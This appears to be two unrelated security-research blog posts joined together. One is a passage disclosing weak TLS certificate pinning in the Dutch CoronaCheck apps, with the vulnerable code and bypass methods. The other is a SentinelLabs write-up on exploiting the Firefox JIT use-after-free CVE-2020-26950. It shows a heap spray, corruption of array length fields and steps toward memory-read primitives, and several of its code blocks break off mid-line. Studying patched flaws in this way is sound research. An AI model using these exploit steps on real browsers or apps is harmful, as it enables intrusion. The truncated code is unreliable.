Then we looked at the verification of the connections set up by the two apps. Part of the configuration of the app needs to be downloaded from a server hosted by the Ministerie van Volksgezondheid, Welzijn en Sport (VWS). This is because test results are retrieved by the app directly from the test provider. This means that the Holder app needs to know which test providers are used right now, how to connect to them and the Verifier app needs to know what keys to use to verify the signatures for that test provider. The privacy aspects of this design are quite good: the test provider only knows the user retrieved the result, but not where they are using it. VWS doesn’t know who has done a test or their results and the Verifier only sees the limited personal information in the QR which is needed to check the identity of the holder. The downside of this is that blocking a specific person’s QR code is difficult.

Strict requirements were formulated for the security of these connections in the design. See here (in Dutch). This includes the use of certificate pinning to check that the certificates are issued a small set of Certificate Authorities (CAs). In addition to the use of TLS, all responses from the APIs must be signed using a signature. This uses the PKCS#7 Cryptographic Message Syntax (CMS) format.

Many of the checks on certificates that were added in the iOS app contained subtle mistakes. Combined, only one implicit check on the certificate (performed by App Transport Security) was still effective. This meant that there was no certificate pinning at all and any malicious CA could generate a certificate capable of intercepting the connections between the app and VWS or a test provider.

Certificate check issues

An iOS app that wants to handle the checking of TLS certificates itself can do so by implementing the delegate method urlSession(_:didReceive:completionHandler:). Whenever a new connection is created, this method is called allowing the app to perform its own checks. It can respond in three different ways: continue with the usual validation (performDefaultHandling), accept the certificate (useCredential) or reject the certificate (cancelAuthenticationChallenge). This function can also be called for other authentication challenges, such as HTTP basic authentication, so it is common to check that the type is NSURLAuthenticationMethodServerTrust first.

This was implemented as follows in SecurityStrategy.swift lines 203 to 262:

203func checkSSL() {
204
205    guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust,
206          let serverTrust = challenge.protectionSpace.serverTrust else {
207
208        logDebug("No security strategy")
209        completionHandler(.performDefaultHandling, nil)
210        return
211    }
212
213    let policies = [SecPolicyCreateSSL(true, challenge.protectionSpace.host as CFString)]
214    SecTrustSetPolicies(serverTrust, policies as CFTypeRef)
215    let certificateCount = SecTrustGetCertificateCount(serverTrust)
216
217    var foundValidCertificate = false
218    var foundValidCommonNameEndsWithTrustedName = false
219    var foundValidFullyQualifiedDomainName = false
220
221    for index in 0 ..< certificateCount {
222
223        if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, index) {
224            let serverCert = Certificate(certificate: serverCertificate)
225
226            if let name = serverCert.commonName {
227                if name.lowercased() == challenge.protectionSpace.host.lowercased() {
228                    foundValidFullyQualifiedDomainName = true
229                    logVerbose("Host matched CN \(name)")
230                }
231                for trustedName in trustedNames {
232                    if name.lowercased().hasSuffix(trustedName.lowercased()) {
233                        foundValidCommonNameEndsWithTrustedName = true
234                        logVerbose("Found a valid name \(name)")
235                    }
236                }
237            }
238            if let san = openssl.getSubjectAlternativeName(serverCert.data), !foundValidFullyQualifiedDomainName {
239                if compareSan(san, name: challenge.protectionSpace.host.lowercased()) {
240                    foundValidFullyQualifiedDomainName = true
241                    logVerbose("Host matched SAN \(san)")
242                }
243            }
244            for trustedCertificate in trustedCertificates {
245
246                if openssl.compare(serverCert.data, withTrustedCertificate: trustedCertificate) {
247                    logVerbose("Found a match with a trusted Certificate")
248                    foundValidCertificate = true
249                }
250            }
251        }
252    }
253
254    if foundValidCertificate && foundValidCommonNameEndsWithTrustedName && foundValidFullyQualifiedDomainName {
255        // all good
256        logVerbose("Certificate signature is good for \(challenge.protectionSpace.host)")
257        completionHandler(.useCredential, URLCredential(trust: serverTrust))
258    } else {
259        logError("Invalid server trust")
260        completionHandler(.cancelAuthenticationChallenge, nil)
261    }
262}

If an app wants to implement additional verification checks, then it is common to start with performing the platform’s own certificate validation. This also means that the certificate chain is resolved. The certificates received from the server may be incomplete or contain additional certificates, by applying the platform verification a chain is constructed ending in a trusted root (if possible). An app that uses a private root could also do this, but while adding the root as the only trust anchor.

This leads to the first issue with the handling of certificate validation in the CoronaCheck app: instead of giving the “continue with the usual validation” result, the app would accept the certificate if its own checks passed (line 257). This meant that the checks are not additions to the verification, but replace it completely. The app does implicitly perform the platform verification to obtain the correct chain (line 215), but the result code for the validation was not checked, so an untrusted certificate was not rejected here.

The app performs 3 additional checks on the certificate:

  • It is issued by one of a list of root certificates (line 246).
  • It contains a Subject Alternative Name containing a specific domain (line 238).
  • It contains a Common Name containing a specific domain (lines 227 and 232).

For checking the root certificate the resolved chain is used and each certificate is compared to a list of certificates hard-coded in the app. This set of roots depends on what type of connection it is. Connections to the test providers are a bit more lenient, while the connection to the VWS servers itself needs to be issued by a specific root.

This check had a critical issue: the comparison was not based on unforgeable data. Comparing certificates properly could be done by comparing them byte-by-byte. Certificates are not very large, this comparison would be fast enough. Another option would be to generate a hash of both certificates and compare those. This could speed up repeated checks for the same certificate. The implemented comparison of the root certificate was based on two checks: comparing the serial number and comparing the “authority key information” extension fields. For trusted certificates, the serial number must be randomly generated by the CA. The authority key information field is usually a hash of the certificate’s issuer’s key, but this can be any data. It is trivial to generate a self-signed certificate with the same serial number and authority key information field as an existing certificate. Combine this with the previous item and it is possible to generate a new, self-signed certificate that is accepted by the TLS verification of the app.

OpenSSL.m lines 144 to 227:

144- (BOOL)compare:(NSData *)certificateData withTrustedCertificate:(NSData *)trustedCertificateData {
145
146	BOOL subjectKeyMatches = [self compareSubjectKeyIdentifier:certificateData with:trustedCertificateData];
147	BOOL serialNumbersMatches = [self compareSerialNumber:certificateData with:trustedCertificateData];
148	return subjectKeyMatches && serialNumbersMatches;
149}
150
151- (BOOL)compareSubjectKeyIdentifier:(NSData *)certificateData with:(NSData *)trustedCertificateData {
152
153	const ASN1_OCTET_STRING *trustedCertificateSubjectKeyIdentifier = NULL;
154	const ASN1_OCTET_STRING *certificateSubjectKeyIdentifier = NULL;
155	BIO *certificateBlob = NULL;
156	X509 *certificate = NULL;
157	BIO *trustedCertificateBlob = NULL;
158	X509 *trustedCertificate = NULL;
159	BOOL isMatch = NO;
160
161	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
162		EXITOUT("Cannot allocate certificateBlob");
163
164	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
165		EXITOUT("Cannot parse certificateData");
166
167	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
168		EXITOUT("Cannot allocate trustedCertificateBlob");
169
170	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
171		EXITOUT("Cannot parse trustedCertificate");
172
173	if (NULL == (trustedCertificateSubjectKeyIdentifier = X509_get0_subject_key_id(trustedCertificate)))
174		EXITOUT("Cannot extract trustedCertificateSubjectKeyIdentifier");
175
176	if (NULL == (certificateSubjectKeyIdentifier = X509_get0_subject_key_id(certificate)))
177		EXITOUT("Cannot extract certificateSubjectKeyIdentifier");
178
179	isMatch = ASN1_OCTET_STRING_cmp(trustedCertificateSubjectKeyIdentifier, certificateSubjectKeyIdentifier) == 0;
180
181errit:
182	BIO_free(certificateBlob);
183	BIO_free(trustedCertificateBlob);
184	X509_free(certificate);
185	X509_free(trustedCertificate);
186
187	return isMatch;
188}
189
190- (BOOL)compareSerialNumber:(NSData *)certificateData with:(NSData *)trustedCertificateData {
191
192	BIO *certificateBlob = NULL;
193	X509 *certificate = NULL;
194	BIO *trustedCertificateBlob = NULL;
195	X509 *trustedCertificate = NULL;
196	ASN1_INTEGER *certificateSerial = NULL;
197	ASN1_INTEGER *trustedCertificateSerial = NULL;
198	BOOL isMatch = NO;
199
200	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
201		EXITOUT("Cannot allocate certificateBlob");
202
203	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
204		EXITOUT("Cannot parse certificate");
205
206	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
207		EXITOUT("Cannot allocate trustedCertificateBlob");
208
209	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
210		EXITOUT("Cannot parse trustedCertificate");
211
212	if (NULL == (certificateSerial = X509_get_serialNumber(certificate)))
213		EXITOUT("Cannot parse certificateSerial");
214
215	if (NULL == (trustedCertificateSerial = X509_get_serialNumber(trustedCertificate)))
216		EXITOUT("Cannot parse trustedCertificateSerial");
217
218	isMatch = ASN1_INTEGER_cmp(certificateSerial, trustedCertificateSerial) == 0;
219
220errit:
221	if (certificateBlob) BIO_free(certificateBlob);
222	if (trustedCertificateBlob) BIO_free(trustedCertificateBlob);
223	if (certificate) X509_free(certificate);
224	if (trustedCertificate) X509_free(trustedCertificate);
225
226	return isMatch;
227}

This combination of issues may sound like TLS validation was completely broken, but luckily there was a safety net. In iOS 9, Apple introduced a mechanism called App Transport Security (ATS) to enforce certificate validation on connections. This is used to enforce the use of secure and trusted HTTPS connections. If an app wants to use an insecure connection (either plain HTTP or HTTPS with certificates not issued by a trusted root), it needs to specifically opt-in to that in its Info.plist file. This creates something of a safety net, making it harder to accidentally disable TLS certificate validation due to programming mistakes.

ATS was enabled for the CoronaCheck apps without any exceptions. This meant that our untrusted certificate, even though accepted by the app itself, was rejected by ATS. This meant we couldn’t completely bypass the certificate validation. This could however still be exploitable in these scenarios:

  • A future update for the app could add an ATS exception or an update to iOS might change the ATS rules. Adding an ATS exception is not as unrealistic as it may sound: the app contains a trusted root that is not included in the iOS trust store (“Staat der Nederlanden Private Root CA - G1”). To actually use that root would require an ATS exception.
  • A malicious CA could issue a certificate using the serial number and authority key information of one of the trusted certificates. This certificate would be accepted by ATS and pass all checks. A reliable CA would not issue such a certificate, but it does mean that the certificate pinning that was part of the requirements was not effective.

Other issues

We found a number of other issues in the verification of certificates. These are of lower impact.

Subject Alternative Names

In the past, the Common Name field was used to indicate for which domain a certificate was for. This was inflexible, because it meant each certificate was only valid for one domain. The Subject Alternative Name (SAN) extension was added to make it possible to add more domain names (or other types of names) to certificates. To correctly verify if a certificate is valid for a domain, the SAN extension has to be checked.

Obtaining the SANs from a certificates was implemented by using OpenSSL to generate a human-readable representation of the SAN extension and then parsing that. This did not take into account the possibility of other name types than a domain name, such as an email addresses in a certificate used for S/MIME. The parsing could be confused using specifically formatted email addresses to make it match any domain name.

SecurityStrategy.swift lines 114 to 127:

114func compareSan(_ san: String, name: String) -> Bool {
115
116    let sanNames = san.split(separator: ",")
117    for sanName in sanNames {
118        // SanName can be like DNS: *.domain.nl
119        let pattern = String(sanName)
120            .replacingOccurrences(of: "DNS:", with: "", options: .caseInsensitive)
121            .trimmingCharacters(in: .whitespacesAndNewlines)
122        if wildcardMatch(name, pattern: pattern) {
123            return true
124        }
125    }
126    return false
127}

For example, an S/MIME certificate containing the email address "a,*,b"@example.com (which is a valid email address) would result in a wildcard domain (*) that matches all hosts.

CMS signatures

The domain name check for the certificate used to generate the CMS signature of the response did not compare the full domain name, instead it checked that a specific string occurred in the domain (coronacheck.nl) and that it ends with a specific string (.nl). This means that an attacker with a certificate for coronacheck.nl.example.nl could also CMS sign API responses.

OpenSSL.m lines 259 to 278:

259- (BOOL)validateCommonNameForCertificate:(X509 *)certificate
260                         requiredContent:(NSString *)requiredContent
261                          requiredSuffix:(NSString *)requiredSuffix {
262    
263    // Get subject from certificate
264    X509_NAME *certificateSubjectName = X509_get_subject_name(certificate);
265    
266    // Get Common Name from certificate subject
267    char certificateCommonName[256];
268    X509_NAME_get_text_by_NID(certificateSubjectName, NID_commonName, certificateCommonName, 256);
269    NSString *cnString = [NSString stringWithUTF8String:certificateCommonName];
270    
271    // Compare Common Name to required content and required suffix
272    BOOL containsRequiredContent = [cnString rangeOfString:requiredContent options:NSCaseInsensitiveSearch].location != NSNotFound;
273    BOOL hasCorrectSuffix = [cnString hasSuffix:requiredSuffix];
274    
275    certificateSubjectName = NULL;
276    
277    return hasCorrectSuffix && containsRequiredContent;
278}

The only issue we found on the Android implementation is similar: the check for the CMS signature used a regex to check the name of the signing certificate. This regex was not bound on the right, making also possible to bypass it using coronacheck.nl.example.com.

SignatureValidator.kt lines 94 to 96:

94fun cnMatching(substring: String): Builder {
95    return cnMatching(Regex(Regex.escape(substring)))
96}

SignatureValidator.kt line 142 to 149:

if (cnMatchingRegex != null) {
    if (!JcaX509CertificateHolder(signingCertificate).subject.getRDNs(BCStyle.CN).any {
            val cn = IETFUtils.valueToString(it.first.value)
            cnMatchingRegex.containsMatchIn(cn)
        }) {
        throw SignatureValidationException("Signing certificate does not match expected CN")
    }
}

Because these certificates had to be issued by PKI-Overheid (a CA run by the Dutch government) certificate, it might not have been easy to obtain a certificate with such a domain name.

Race condition

We also found a race condition in the application of the certificate validation rules. As we mentioned, the rules the app applied for certificate validation were more strict for VWS connections than for connections to test providers, and even for connections to VWS there were different levels of strictness. However, if two requests were performed quickly after another, the first request could be validated based on the verification rules specified for the second request. In practice, the least strict verification rules still require a valid certificate, so this can not be used to intercept connections either. However, it was already triggering in normal use, as the app was initiating two requests with different validation rules immediately after starting.

Reporting

We reported these vulnerabilities to the email address on the “Kwetsbaarheid melden” (Report a vulnerability) page on June 30th, 2021. This email bounced because the address did not exist. We had to reach out through other channels to find a working address. We received an acknowledgement that the message was received, but no further updates. The vulnerabilities were fixed quietly, without letting us know that they were fixed.

In October we decided to look at the code on GitHub to check if all issues were resolved correctly. While most issues were fixed, one was not fixed properly. We sent another email detailing this issue. This was again fixed without informing us.

Developers are of course not required to keep us in the loop of the if we report a vulnerability, but this does show that if they had, we could have caught the incorrect fix much earlier.

Recommendation

TLS certificate validation is a complex process. This case demonstrates that adding more checks is not always better, because they might interfere with the normal platform certificate validation. We recommend changing the certificate validation process only if absolutely necessary. Any extra checks should have a clear security goal. Checks such as “the domain must contain the string …” (instead of “must end with …”) have no security benefit and should be avoided.

Certificate pinning not only has implementation challenges, but also operational challenges. If a certificate renewal has not been properly planned, then it may leave an app unable to connect. This is why we usually recommend pinning only for applications handling very sensitive user data. Other checks can be implemented to address the risk of a malicious or compromised CA with much less chance of problems, for example checking the revocation and Certificate Transparency status of a certificate.

Conclusion

We found and reported a number of issues in the verification of TLS certificates used for the connections of the Dutch CoronaCheck apps. These vulnerabilities could have been combined to bypass certificate pinning in the app. In most cases, this could only be abused by a compromised or malicious CA or if a specific CA could be used to issue a certificate for a certain domain. These vulnerabilities have since then been fixed.

Firefox JIT Use-After-Frees | Exploiting CVE-2020-26950

3 February 2022 at 16:30

Executive Summary

  • SentinelLabs worked on examining and exploiting a previously patched vulnerability in the Firefox just-in-time (JIT) engine, enabling a greater understanding of the ways in which this class of vulnerability can be used by an attacker.
  • In the process, we identified unique ways of constructing exploit primitives by using function arguments to show how a creative attacker can utilize parts of their target not seen in previous exploits to obtain code execution.
  • Additionally, we worked on developing a CodeQL query to identify whether there were any similar vulnerabilities that shared this pattern.

Contents

Introduction

At SentinelLabs, we often look into various complicated vulnerabilities and how they’re exploited in order to understand how best to protect customers from different types of threats.

CVE-2020-26950 is one of the more interesting Firefox vulnerabilities to be fixed. Discovered by the 360 ESG Vulnerability Research Institute, it targets the now-replaced JIT engine used in Spidermonkey, called IonMonkey.

Within a month of this vulnerability being found in late 2020, the area of the codebase that contained the vulnerability had become deprecated in favour of the new WarpMonkey engine.

What makes this vulnerability interesting is the number of constraints involved in exploiting it, to the point that I ended up constructing some previously unseen exploit primitives. By knowing how to exploit these types of unique bugs, we can work towards ensuring we detect all the ways in which they can be exploited.

Just-in-Time (JIT) Engines

When people think of web browsers, they generally think of HTML, JavaScript, and CSS. In the days of Internet Explorer 6, it certainly wasn’t uncommon for web pages to hang or crash. JavaScript, being the complicated high-level language that it is, was not particularly useful for fast applications and improvements to allocators, lazy generation, and garbage collection simply wasn’t enough to make it so. Fast forward to 2008 and Mozilla and Google both released their first JIT engines for JavaScript.

JIT is a way for interpreted languages to be compiled into assembly while the program is running. In the case of JavaScript, this means that a function such as:

function add() {
	return 1+1;
}

can be replaced with assembly such as:

push    rbp
mov     rbp, rsp
mov     eax, 2
pop     rbp
ret

This is important because originally the function would be executed using JavaScript bytecode within the JavaScript Virtual Machine, which compared to assembly language, is significantly slower.

Since JIT compilation is quite a slow process due to the huge amount of heuristics that take place (such as constant folding, as shown above when 1+1 was folded to 2), only those functions that would truly benefit from being JIT compiled are. Functions that are run a lot (think 10,000 times or so) are ideal candidates and are going to make page loading significantly faster, even with the tradeoff of JIT compilation time.

Redundancy Elimination

Something that is key to this vulnerability is the concept of eliminating redundant nodes. Take the following code:

function read(i) {
	if (i 

This would start as the following JIT pseudocode:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Get value of 'i'
6. Add 2 to GetValue5
7. Return Int32 Add6
8. Get value of 'i'
9. Add 1 to GetValue8
10. Return Add9 as an Int32

In this, we see that we get the value of argument i multiple times throughout this code. Since the value is never set in the function and only read, having multiple GetValue nodes is redundant since only one is required. JIT Compilers will identify this and reduce it to the following:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Add 2 to GetValue2
6. Return Int32 Add5
7. Add 1 to GetValue2
8. Return Add7 as an Int32

CVE-2020-26950 exploits a flaw in this kind of assumption.

IonMonkey 101

How IonMonkey works is a topic that has been covered in detail several times before. In the interest of keeping this section brief, I will give a quick overview of the IonMonkey internals. If you have a greater interest in diving deeper into the internals, the linked articles above are a must-read.

JavaScript doesn’t immediately get translated into assembly language. There are a bunch of steps that take place first. Between bytecode and assembly, code is translated into several other representations. One of these is called Middle-Level Intermediate Representation (MIR). This representation is used in Control-Flow Graphs (CFGs) that make it easier to perform compiler optimisations on.

Some examples of MIR nodes are:

  • MGuardShape - Checks that the object has a particular shape (The structure that defines the property names an object has, as well as their offset in the property array, known as the slots array) and falls back to the interpreter if not. This is important since JIT code is intended to be fast and so needs to assume the structure of an object in memory and access specific offsets to reach particular properties.
  • MCallGetProperty - Fetches a given property from an object.

Each of these nodes has an associated Alias Set that describes whether they Load or Store data, and what type of data they handle. This helps MIR nodes define what other nodes they depend on and also which nodes are redundant. For example, a node that reads a property will depend on either the first node in the graph or the most recent node that writes to the property.

In the context of the GetValue pseudocode above, these would have a Load Alias Set since they are loading rather than storing values. Since there are no Store nodes between them that affect the variable they’re loading from, they would have the same dependency. Since they are the same node and have the same dependency, they can be eliminated.

If, however, the variable were to be written to before the second GetValue node, then it would depend on this Store instead and will not be removed due to depending on a different node. In this case, the GetValue node is Aliasing with the node that writes to the variable.

The Vulnerability

With open-source software such as Firefox, understanding a vulnerability often starts with the patch. The Mozilla Security Advisory states:

CVE-2020-26950: Write side effects in MCallGetProperty opcode not accounted for
In certain circumstances, the MCallGetProperty opcode can be emitted with unmet assumptions resulting in an exploitable use-after-free condition.

The critical part of the patch is in IonBuilder::createThisScripted as follows:

IonBuilder::createThisScripted patch

To summarise, the code would originally try to fetch the object prototype from the Inline Cache using the MGetPropertyCache node (Lines 5170 to 5175). If doing so causes a bailout, it will next switch to getting the prototype by generating a MCallGetProperty node instead (Lines 5177 to 5180).

After this fix, the MCallGetProperty node is no longer generated upon bailout. This alone would likely cause a bailout loop, whereby the MGetPropertyCache node is used, a bailout occurs, then the JIT gets regenerated with the exact same nodes, which then causes the same bailout to happen (See: Definition of insanity).

The patch, however, has added some code to IonGetPropertyIC::update that prevents this loop from happening by disabling IonMonkey entirely for this script if the MGetPropertyCache node fails for JSFunction object types:

IonBuilder code to prevent a bailout-loop

So the question is, what’s so bad about the MCallGetProperty node?

Looking at the code, it’s clear that when the node is idempotent, as set on line 5179, the Alias Set is a Load type, which means that it will never store anything:

Alias Set when idempotent is true

This isn’t entirely correct. In the patch, the line of code that disables Ion for the script is only run for JSFunction objects when fetching the prototype property, which is exactly what IonBuilder::createThisScripted is doing, but for all objects.

From this, we can conclude that this is an edge case where JSFunction objects have a write side effect that is triggered by the MCallGetProperty node.

Lazy Properties

One of the ways that JavaScript engines improve their performance is to not generate things if not absolutely necessary. For example, if a function is created and is never run, parsing it to bytecode would be a waste of resources that could be spent elsewhere. This last-minute creation is a concept called laziness, and JSFunction objects perform lazy property resolution for their prototypes.

When the MCallGetProperty node is converted to an LCallGetProperty node and is then turned to assembly using the Code Generator, the resulting code makes a call back to the engine function GetValueProperty. After a series of other function calls, it reaches the function LookupOwnPropertyInline. If the property name is not found in the object shape, then the object class’ resolve hook is called.

Calling the resolve hook

The resolve hook is a function specified by object classes to generate lazy properties. It’s one of several class operations that can be specified:

The JSClassOps struct

In the case of the JSFunction object type, the function fun_resolve is used as the resolve hook.

The property name ID is checked against the prototype property name. If it matches and the JSFunction object still needs a prototype property to be generated, then it executes the ResolveInterpretedFunctionPrototype function:

The ResolveInterpretedFunctionPrototype function

This function then calls DefineDataProperty to define the prototype property, add the prototype name to the object shape, and write it to the object slots array. Therefore, although the node is supposed to only Load a value, it has ended up acting as a Store.

The issue becomes clear when considering two objects allocated next to each other:

If the first object were to have a new property added, there’s no space left in the slots array, which would cause it to be reallocated, as so:

In terms of JIT nodes, if we were to get two properties called x and y from an object called o, it would generate the following nodes:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. GuardShape of object 'o'
5. Slots of object 'o'
6. LoadDynamicSlot 'y' from slots5

Thinking back to the redundancy elimination, if properties x and y are both non-getter properties, there’s no way to change the shape of the object o, so we only need to guard the shape once and get the slots array location once, reducing it to this:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. LoadDynamicSlot 'y' from slots2

Now, if object o is a JSFunction and we can trigger the vulnerability above between the two, the location of the slots array has now changed, but the second LoadDynamicSlot node will still be using the old location, resulting in a use-after-free:

Use-after-free

The final piece of the puzzle is how the function IonBuilder::createThisScripted is called. It turns out that up a chain of calls, it originates from the jsop_call function. Despite the name, it isn’t just called when generating the MIR node for JSOp::Call, but also several other nodes:

The vulnerable code path will also only be taken if the second argument (constructing) is true. This means that the only opcodes that can reach the vulnerability are JSOp::New and JSOp::SuperCall.

Variant Analysis

In order to look at any possible variations of this vulnerability, Firefox was compiled using CodeQL and a query was written for the bug.

import cpp
 
// Find all C++ VM functions that can be called from JIT code
class VMFunction extends Function {
   VMFunction() {
       this.getAnAccess().getEnclosingVariable().getName() = "vmFunctionTargets"
   }
}
 
// Get a string representation of the function path to a given function (resolveConstructor/DefineDataProperty)
// depth - to avoid going too far with recursion
string tracePropDef(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | fc.getEnclosingFunction() = f and ((fc.getTarget().getName() = "DefineDataProperty" and result = f.getName().toString()) or (not fc.getTarget().getName() = "DefineDataProperty" and result = tracePropDef(depth + 1, fc.getTarget()) + " -> " + f.getName().toString())))
}
 
// Trace a function call to one that starts with 'visit' (CodeGenerator uses visit, so we can match against MIR with M)
// depth - to avoid going too far with recursion
Function traceVisit(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | (f.getName().matches("visit%") and result = f)or (fc.getTarget() = f and result = traceVisit(depth + 1, fc.getEnclosingFunction())))
}
 
// Find the AliasSet of a given MIR node by tracing from inheritance.
Function alias(Class c) {
   (result = c.getAMemberFunction() and result.getName().matches("%getAlias%")) or (result = alias(c.getABaseClass()))
}
 
// Matches AliasSet::Store(), AliasSet::Load(), AliasSet::None(), and AliasSet::All()
class AliasSetFunc extends Function {
   AliasSetFunc() {
       (this.getName() = "Store" or this.getName() = "Load" or this.getName() = "None" or this.getName() = "All") and this.getType().getName() = "AliasSet"
   }
}
 
from VMFunction f, FunctionCall fc, Function basef, Class c, Function aliassetf, AliasSetFunc asf, string path
where fc.getTarget().getName().matches("%allVM%") and f = fc.getATemplateArgument().(FunctionAccess).getTarget() // Find calls to the VM from JIT
and path = tracePropDef(0, f) // Where the VM function has a path to resolveConstructor (Getting the path as a string)
and basef = traceVisit(0, fc.getEnclosingFunction()) // Find what LIR node this VM function was created from
and c.getName().charAt(0) = "M" // A quick hack to check if the function is a MIR node class
and aliassetf = alias(c) // Get the getAliasSet function for this class
and asf.getACallToThisFunction().getEnclosingFunction() = aliassetf // Get the AliasSet returned in this function.
and basef.getName().substring(5, c.getName().suffix(1).length() + 5) = c.getName().suffix(1) // Get the actual node name (without the L or M prefix) to match against the visit* function
and (asf.toString() = "Load" or asf.toString() = "None") // We're only interested in Load and None alias sets.
select c, f, asf, basef, path

This produced a number of results, most of which were for properties defined for new objects such as errors. It did, however, reveal something interesting in the MCreateThis node. It appears that the node has AliasSet::Load(AliasSet::Any), despite the fact that when a constructor is called, it may generate a prototype with lazy evaluation, as described above.

However, this bug is actually unexploitable since this node is followed by either an MCall node, an MConstructArray node, or an MApplyArgs node. All three of these nodes have AliasSet::Store(AliasSet::Any), so any MSlots nodes that follow the constructor call will not be eliminated, meaning that there is no way to trigger a use-after-free.

Triggering the Vulnerability

The proof-of-concept reported to Mozilla was reduced by Jan de Mooij to a basic form. In order to make it readable, I’ve added comments to explain what each important line is doing:

function init() {
 
   // Create an object to be read for the UAF
   var target = {};
   for (var i = 0; i 

Exploiting CVE-2020-26950

Use-after-frees in Spidermonkey don’t get written about a lot, especially when it comes to those caused by JIT.

As with any heap-related exploit, the heap allocator needs to be understood. In Firefox, you’ll encounter two heap types:

  • Nursery - Where most objects are initially allocated.
  • Tenured - Objects that are alive when garbage collection occurs are moved from the nursery to here.

The nursery heap is relatively straight forward. The allocator has a chunk of contiguous memory that it uses for user allocation requests, an offset pointing to the next free spot in this region, and a capacity value, among other things.

Exploiting a use-after-free in the nursery would require the garbage collector to be triggered in order to reallocate objects over this location as there is no reallocation capability when an object is moved.

Due to the simplicity of the nursery, a use-after-free in this heap type is trickier to exploit from JIT code. Because JIT-related bugs often have a whole number of assumptions you need to maintain while exploiting them, you’re limited in what you can do without breaking them. For example, with this bug you need to ensure that any instructions you use between the Slots pointer getting saved and it being used when freed are not aliasing with the use. If they were, then that would mean that a second MSlots node would be required, preventing the use-after-free from occurring. Triggering the garbage collector puts us at risk of triggering a bailout, destroying our heap layout, and thus ruining the stability of the exploit.

The tenured heap plays by different rules to the nursery heap. It uses mozjemalloc (a fork of jemalloc) as a backend, which gives us opportunities for exploitation without touching the GC.

As previously mentioned, the tenured heap is used for long-living objects; however, there are several other conditions that can cause allocation here instead of the nursery, such as:

  • Global objects - Their elements and slots will be allocated in the tenured heap because global objects are often long-living.
  • Large objects - The nursery has a maximum size for objects, defined by the constant MaxNurseryBufferSize, which is 1024.

By creating an object with enough properties, the slots array will instead be allocated in the tenured heap. If the slots array has less than 256 properties in it, then jemalloc will allocate this as a “Small” allocation. If it has 256 or more properties in it, then jemalloc will allocate this as a “Large” allocation. In order to further understand these two and their differences, it’s best to refer to these two sources which extensively cover the jemalloc allocator. For this exploit, we will be using Large allocations to perform our use-after-free.

Reallocating

In order to write a use-after-free exploit, you need to allocate something useful in the place of the previously freed location. For JIT code this can be difficult because many instructions would stop the second MSlots node from being removed. However, it’s possible to create arrays between these MSlots nodes and the property access.

Array element backing stores are a great candidate for reallocation because of their header. While properties start at offset 0 in their allocated Slots array, elements start at offset 0x10:

A comparison between the elements backing store and the slots backing store

If a use-after-free were to occur, and an elements backing store was reallocated on top, the length values could be updated using the first and second properties of the Slots backing store.

To get to this point requires a heap spray similar to the one used in the trigger example above:

/*
   jitme - Triggers the vulnerability
*/
function jitme(cons, interesting, i) {
   interesting.x1 = 10; // Make sure the MSlots is saved
 
   new cons(); // Trigger the vulnerability - Reallocates the object slots
 
   // Allocate a large array on top of this previous slots location.
   let target = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 489 to be close to the number of properties ‘cons’ has
  
   // Avoid Elements Copy-On-Write by pushing a value
   target.push(i);
  
   // Write the Initialized Length, Capacity, and Length to be larger than it is
   // This will work when interesting == cons
   interesting.x1 = 3.476677904727e-310;
   interesting.x0 = 3.4766779039175e-310;
 
   // Return the corrupted array
   return target;
}
 
/*
   init - Initialises vulnerable objects
*/
function init() {
   // arr will contain our sprayed objects
   var arr = [];
 
   // We'll create one object...
   var cons = function() {};
   for(i=0; i

Which gets us to this layout:

Before and after the use-after-free is exploited

At this point, we have an Array object with a corrupted elements backing store. It can only read/write Nan-Boxed values to out of bounds locations (in this case, the next Slots store).

Going from this layout to some useful primitives such as ‘arbitrary read’, ‘arbitrary write’, and ‘address of’ requires some forethought.

Primitive Design

Typically, the route exploit developers go when creating primitives in browser exploitation is to use ArrayBuffers. This is because the values in their backing stores aren’t NaN-boxed like property and element values are, meaning that if an ArrayBuffer and an Array both had the same backing store location, the ArrayBuffer could make fake Nan-Boxed pointers, and the Array could use them as real pointers using its own elements. Likewise, the Array could store an object as its first element, and the ArrayBuffer could read it directly as a Float64 value.

This works well with out-of-bounds writes in the nursery because the ArrayBuffer object will be allocated next to other objects. Being in the tenured heap means that the ArrayBuffer object itself will be inaccessible as it is in the nursery. While the ArrayBuffer backing store can be stored in the tenured heap, Mozilla is already very aware of how it is used in exploits and have thus created a separate arena for them:

Instead of thinking of how I could get around this, I opted to read through the Spidermonkey code to see if I could come up with a new primitive that would work for the tenured heap. While there were a number of options related to WASM, function arguments ended up being the nicest way to implement it.

Function Arguments

When you call a function, a new object gets created called arguments. This allows you to access not just the arguments defined by the function parameters, but also those that aren’t:

function arg() {
   return arguments[0] + arguments[1];
}

arg(1,2);

Spidermonkey represents this object in memory as an ArgumentsObject. This object has a reserved property that points to an ArgumentsData backing store (of course, stored in the tenured heap when large enough), where it holds an array of values supplied as arguments.

One of the interesting properties of the arguments object is that you can delete individual arguments. The caveat to this is that you can only delete it from the arguments object, but an actual named parameter will still be accessible:

function arg(x) {
   console.log(x); // 1
